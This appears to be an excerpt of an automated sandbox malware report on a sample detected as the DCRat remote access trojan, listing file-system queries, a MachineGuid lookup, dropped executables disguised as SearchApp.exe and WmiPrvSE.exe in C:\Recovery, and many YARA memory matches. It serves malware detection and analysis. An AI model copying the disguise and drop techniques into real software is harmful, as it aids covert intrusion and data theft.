Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\SearchApp.exe	Queries volume information: C:\Recovery\SearchApp.exe VolumeInformation
Source: C:\Recovery\SearchApp.exe	Queries volume information: C:\Recovery\SearchApp.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe	Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe	Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe	Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\SearchApp.exe	Queries volume information: C:\Recovery\SearchApp.exe VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe	Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\SearchApp.exe	Queries volume information: C:\Recovery\SearchApp.exe VolumeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe	Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\SearchApp.exe	Queries volume information: C:\Recovery\SearchApp.exe VolumeInformation
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Queries volume information: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe	Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\SearchApp.exe	Queries volume information: C:\Recovery\SearchApp.exe VolumeInformation

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: kQyd2z80gD.exe, type: SAMPLE
Source: Yara match	File source: 0.0.kQyd2z80gD.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002E.00000002.2878007510.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3307757545.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2362007456.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.3048134310.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3307757545.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2878007510.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2044705339.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.3211729351.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2370785777.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3307757545.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3137179400.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2365186797.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2962029789.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.3048134310.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2369951863.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2800446786.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2962029789.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2354789966.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2535198936.000000000259D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2364082505.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2535198936.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2356027652.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.3211729351.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2800446786.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.3211729351.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2613445983.00000000024E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2703597080.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2448716973.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2613445983.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2362007456.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kQyd2z80gD.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 5708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 1252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 4568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 8076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 8168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 7956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 5688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SearchApp.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: kQyd2z80gD.exe, type: SAMPLE
Source: Yara match	File source: 0.0.kQyd2z80gD.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002E.00000002.2878007510.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3307757545.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2362007456.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.3048134310.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3307757545.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2878007510.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2044705339.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3509612043.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.3211729351.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2370785777.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3307757545.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3137179400.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2365186797.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2962029789.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.3048134310.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2369951863.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2800446786.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2962029789.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2354789966.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2535198936.000000000259D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2364082505.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2535198936.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2356027652.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
